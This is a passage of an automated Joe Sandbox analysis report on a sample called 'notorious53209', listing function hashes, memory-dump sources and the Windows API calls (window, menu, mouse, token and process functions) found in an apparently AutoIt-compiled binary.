                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                                  • Instruction ID: 565b1416b449dda97e7e8ad3bca31999bb646f53bf8f6db01da499c645ec543d
                                                  • Opcode Fuzzy Hash: 90ab693c7abe81b2fd9a64eec182ed1a4fd0259cd70e1d50dc61269124c4c525
                                                  • Instruction Fuzzy Hash: D0417F31604641EFDB22CF28C499B957BE4FF05324F5842B9FA588F6E2C731A846DB61
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 008F73BF
                                                    • Part of subcall function 008F3C94: GetWindowRect.USER32(?,?), ref: 008F3CA7
                                                  • GetDesktopWindow.USER32 ref: 008F73E9
                                                  • GetWindowRect.USER32(00000000), ref: 008F73F0
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008F7422
                                                    • Part of subcall function 008E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                                                  • GetCursorPos.USER32(?), ref: 008F744E
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008F74AC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                                                  • Instruction ID: 2effba4343483ca912074178f4cf5b938a87c5472b501b071bfec36aa33e032c
                                                  • Opcode Fuzzy Hash: 70878cb5852f0eaeb40f62bb09e1493810bbb9537b2fcb98d8e539c8df08e38d
                                                  • Instruction Fuzzy Hash: 3731C372508309AFD720DF24D849E6ABBE9FF99314F000919F588D7191CA30EA09CB96
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                  • _wcstok.LIBCMT ref: 008EEEFF
                                                  • _wcscpy.LIBCMT ref: 008EEF8E
                                                  • _memset.LIBCMT ref: 008EEFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: 12ccec537c0f3c1552c103620e1791621b4327a3bc07e97f616622da947ca074
                                                  • Instruction ID: d2dad40cf607b7775adbe63807318475bbd9c6ce636a99110615d909349183f1
                                                  • Opcode Fuzzy Hash: 12ccec537c0f3c1552c103620e1791621b4327a3bc07e97f616622da947ca074
                                                  • Instruction Fuzzy Hash: 63C137315087409FD724EF28C881A6AB7E4FF85314F14496DF999DB2A2DB70ED45CB82
                                                  APIs
                                                    • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008D8608
                                                    • Part of subcall function 008D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008D8612
                                                    • Part of subcall function 008D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008D8621
                                                    • Part of subcall function 008D85F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008D8628
                                                    • Part of subcall function 008D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008D863E
                                                  • GetLengthSid.ADVAPI32(?,00000000,008D8977), ref: 008D8DAC
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008D8DB8
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008D8DBF
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 008D8DD8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,008D8977), ref: 008D8DEC
                                                  • HeapFree.KERNEL32(00000000), ref: 008D8DF3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 169236558-0
                                                  • Opcode ID: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                                                  • Instruction ID: 160df05ceaf3ff4484c9e0236cbcf8be39cce4e16c6ea5139ddb76ad194db832
                                                  • Opcode Fuzzy Hash: 076a3f5cebb504edb0c556e483315160af4aca8a8d7e5e28365e342316c9a20d
                                                  • Instruction Fuzzy Hash: 1911DC31514604FFDB609FA4CC18BAE7BBAFF54315F10422AE885D3290CB32AA40DB60
                                                  APIs
                                                    • Part of subcall function 008812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0088134D
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088135C
                                                    • Part of subcall function 008812F3: BeginPath.GDI32(?), ref: 00881373
                                                    • Part of subcall function 008812F3: SelectObject.GDI32(?,00000000), ref: 0088139C
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0090C1C4
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 0090C1D8
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0090C1E6
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 0090C1F6
                                                  • EndPath.GDI32(00000000), ref: 0090C206
                                                  • StrokePath.GDI32(00000000), ref: 0090C216
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                                                  • Instruction ID: 850b8316c13ba154ec8f1deac25e582e43b9bd2ee6d3512912b57753274d102e
                                                  • Opcode Fuzzy Hash: ce98479c4fab7837663ca0d2d22fd6c3feebe60417b4c29952133d6eda68470b
                                                  • Instruction Fuzzy Hash: 09111BB640810CBFDF119F94DC88FAA7FADEF09354F048021BA188A5A1C7719E55EBA0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                                                  • Instruction ID: f28b384e10350ffd9a44f37633fc6fa819085a694c9beae79b76f30df141b19a
                                                  • Opcode Fuzzy Hash: c069bdf56114c9912dedbcc37c4a7db2837ae170db7ce178728141ec7771ee23
                                                  • Instruction Fuzzy Hash: 35016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008E569B
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008E56B1
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 008E56C0
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56CF
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008E56D9
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E56E0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                                                  • Instruction ID: d8d3bb6daed54b92c467a2159ad401ede001c690ed63d35edf500b53831c2a6b
                                                  • Opcode Fuzzy Hash: 3a2e6ce6df0b9d2f1ab10d25040f45f4c379fdaa2d47b99f6854cc81d8a9779f
                                                  • Instruction Fuzzy Hash: BAF01D32259558BFE7315BA29C1DEAB7B7CEBC6B11F000169FA04D14609AA11B0196B5
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 008E74E5
                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 008E74F6
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00891044,?,?), ref: 008E7503
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008E7510
                                                    • Part of subcall function 008E6ED7: CloseHandle.KERNEL32(00000000), ref: 008E6EE1
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7523
                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 008E752A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                                                  • Instruction ID: 07032e2d4dd716a57adb5ebb557492a498593b0f6cb98fb0340c7f0d150ff85d
                                                  • Opcode Fuzzy Hash: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                                                  • Instruction Fuzzy Hash: 44F05E3A158B12EFDB212B68FC9C9EB7B2AFF45702B100531F202918B4DB755A51DB90
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 008F8928
                                                  • CharUpperBuffW.USER32(?,?), ref: 008F8A37
                                                  • VariantClear.OLEAUT32(?), ref: 008F8BAF
                                                    • Part of subcall function 008E7804: VariantInit.OLEAUT32(00000000), ref: 008E7844
                                                    • Part of subcall function 008E7804: VariantCopy.OLEAUT32(00000000,?), ref: 008E784D
                                                    • Part of subcall function 008E7804: VariantClear.OLEAUT32(00000000), ref: 008E7859
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: d608d7f0f8c565b1c711fdacddd5d5e4e865b0aa45bc7aa56a503d786b850f78
                                                  • Instruction ID: dd277188b70625708b1628fcbf87b11b31500a3048ae9b3794a2c6699be8c30f
                                                  • Opcode Fuzzy Hash: d608d7f0f8c565b1c711fdacddd5d5e4e865b0aa45bc7aa56a503d786b850f78
                                                  • Instruction Fuzzy Hash: 62915771608305DFC714EF28C48596ABBE4FF89714F04496EF99ACB262DB30E906CB52
                                                  APIs
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                  • _memset.LIBCMT ref: 008E3077
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E30A6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E3159
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008E3187
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: c8bb505c59ebdd30186033ce6d6451d66d69251186e788eb62581d6f50dc6925
                                                  • Instruction ID: e7e971594ecd8c0b2f87eb54015f05ebc092ecfee90973de7545b8ad91a5eaaf
                                                  • Opcode Fuzzy Hash: c8bb505c59ebdd30186033ce6d6451d66d69251186e788eb62581d6f50dc6925
                                                  • Instruction Fuzzy Hash: 1851B071618380AED7259F29C849A6BB7E8FF97364F040A2DF895D3291DB70CE448753
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 008DDAC5
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008DDAFB
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 008DDB0C
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008DDB8E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                                                  • Instruction ID: de9e762a70995c1ee1f30afc382ae26b390cf162c0dc517ed6ad7b0900a7ab1a
                                                  • Opcode Fuzzy Hash: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                                                  • Instruction Fuzzy Hash: B5414CB1600309EFDB15CF54C884A9A7BA9FF48364F1582ABAD05DF305D7B1DA44DBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2CAF
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008E2CCB
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 008E2D11
                                                  • DeleteMenu.USER32(?,00000000,00000000), ref: 008E2D5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                                                  • Instruction ID: 2ac68c5aef11cf3814ac4e4f3ee0b7d94c8ea95fd0e23b4cdd03a56b8697b4c0
                                                  • Opcode Fuzzy Hash: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                                                  • Instruction Fuzzy Hash: 24418D702093859FD724DF29DC44B1ABBA8FF86320F14466DFA65D7291D770E904CB92
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 008FDAD9
                                                    • Part of subcall function 008879AB: _memmove.LIBCMT ref: 008879F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  • Opcode ID: fd5efcc6838a9ed3ef2a171fd2a9e0fa50584e363cd4fc00ac1b4c9a69297a56
                                                  • Instruction ID: eb16e577993ae86790cda170bb0273fafe040fd8b63bd95524dc82ff83c75186
                                                  • Opcode Fuzzy Hash: fd5efcc6838a9ed3ef2a171fd2a9e0fa50584e363cd4fc00ac1b4c9a69297a56
                                                  • Instruction Fuzzy Hash: 7531A17150421DAFCF14EF68CC819BEB7B5FF05320B108A29EA65D7691CB71E906CB81
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008D93F6
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008D9409
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 008D9439
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: 09c87945d1c3f6f4fa14e3739fb3028094ad8ca73d7451b458e73b1fc3e9f28e
                                                  • Instruction ID: a6adef4e44686b21fe98962b67870ecbaaeb5a71a8f6e80852ecb3ef42ae75d4
